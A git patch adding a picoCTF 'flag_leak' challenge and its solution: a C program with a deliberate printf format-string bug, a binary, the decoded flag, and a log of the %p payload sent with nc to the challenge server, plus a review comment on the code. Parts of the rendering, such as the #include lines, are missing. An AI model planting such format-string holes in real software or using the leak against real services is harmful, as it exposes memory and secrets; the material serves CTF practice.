From f4feacef1d1cc02a9db34051ac747d0be10cfb82 Mon Sep 17 00:00:00 2001
From: h7x4
Date: Tue, 3 Sep 2024 23:03:46 +0200
Subject: [PATCH] pwn/flag_leak
---
 pwn/flag_leak/flag.txt | 5 +++++
 pwn/flag_leak/output.txt | 3 +++
 pwn/flag_leak/vuln | Bin 0 -> 15876 bytes
 pwn/flag_leak/vuln.c | 46 +++++++++++++++++++++++++++++++++++++++
 4 files changed, 54 insertions(+)
 create mode 100644 pwn/flag_leak/flag.txt
 create mode 100644 pwn/flag_leak/output.txt
 create mode 100755 pwn/flag_leak/vuln
 create mode 100644 pwn/flag_leak/vuln.c
diff --git a/pwn/flag_leak/flag.txt b/pwn/flag_leak/flag.txt
new file mode 100644
index 0000000..d98d0c0
--- /dev/null
+++ b/pwn/flag_leak/flag.txt
@@ -0,0 +1,5 @@
+# 0x6f6369700x7b4654430x6b34334c0x5f676e310x67346c460x6666305f0x3474535f0x395f6b630x326539390x7d343238
+#
+# https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Simple%20string','string':'.'%7D,'%20',true,false,true,false)Swap_endianness('Hex',4,true)From_Hex('Auto')&input=MHg2ZjYzNjk3MDB4N2I0NjU0NDMweDZiMzQzMzRjMHg1ZjY3NmUzMTB4NjczNDZjNDYweDY2NjYzMDVmMHgzNDc0NTM1ZjB4Mzk1ZjZiNjMweDMyNjUzOTM5MHg3ZDM0MzIzOA
+
+picoCTF{L34k1ng_Fl4g_0ff_St4ck_999e2824}
diff --git a/pwn/flag_leak/output.txt b/pwn/flag_leak/output.txt
new file mode 100644
index 0000000..f5f3e94
--- /dev/null
+++ b/pwn/flag_leak/output.txt
@@ -0,0 +1,3 @@ +$ nc saturn.picoctf.net 49378 <<<"%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p" +Tell me a story and then I'll tell you one >> Here's a story - +0xffc3b7100xffc3b7300x80493460x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x2570250x6f6369700x7b4654430x6b34334c0x5f676e310x67346c460x6666305f0x3474535f0x395f6b630x326539390x7d3432380xfbad20000x33f1c800(nil)0xea7119900x804c0000x8049410(nil)0x804c0000xffc3b7f80x80494180x20xffc3b8a40xffc3b8b0(nil)0xffc3b810(nil)(nil)0xea507ed5 
diff --git a/pwn/flag_leak/vuln b/pwn/flag_leak/vuln new file mode 100755 index 0000000000000000000000000000000000000000..666c7d1a41b03a6eae1b0f5d5854bf1edd4eab8d GIT binary patch literal 15876 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 +#include +#include +#include +#include +#include +#include + 
+#define BUFSIZE 64
+#define FLAGSIZE 64
+
+void readflag(char* buf, size_t len) {
+ FILE *f = fopen("flag.txt","r");
+ if (f == NULL) {
+ printf("%s %s", "Please create 'flag.txt' in this directory with your",
+ "own debugging flag.\n");
+ exit(0);
+ }
+
+ fgets(buf,len,f); // size bound read
+}
+
+void vuln(){
+ char flag[BUFSIZE];
+ char story[128];
+
+ readflag(flag, FLAGSIZE);
+
+ printf("Tell me a story and then I'll tell you one >> ");
+ scanf("%127s", story);
+ printf("Here's a story - \n");
+ printf(story);
+ printf("\n");
+}
+
+int main(int argc, char **argv){
+
+ setvbuf(stdout, NULL, _IONBF, 0);
+
+ // Set the gid to the effective gid
+ // this prevents /bin/sh from dropping the privileges
+ gid_t gid = getegid();
+ setresgid(gid, gid, gid);
+ vuln();
+ return 0;
+}
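Review bot: `printf(story)` in vuln() is the intended format-string leak for this challenge (output.txt shows the flag bytes coming back through a `%p` chain), but nothing in the source says so and -Wformat-security will flag it, so mark the intent: `printf(story); // intentional format-string bug: leaks the flag copy sitting on the stack`. In the same function `flag` is declared with BUFSIZE but filled with FLAGSIZE; they both happen to be 64, but `readflag(flag, sizeof flag);` keeps the read bounded by the actual array if either constant is later changed. readflag() also never closes `f` and ignores the fgets() result, so an empty flag.txt leaves `flag` uninitialized and the leak prints stack garbage; `if (fgets(buf, len, f) == NULL) buf[0] = '\0'; fclose(f);` would make the challenge deterministic. The `diff --git` header for vuln.c appears to be swallowed by the preceding binary blob in this rendering and the `#include` targets are missing, so the file may not be shown exactly as committed.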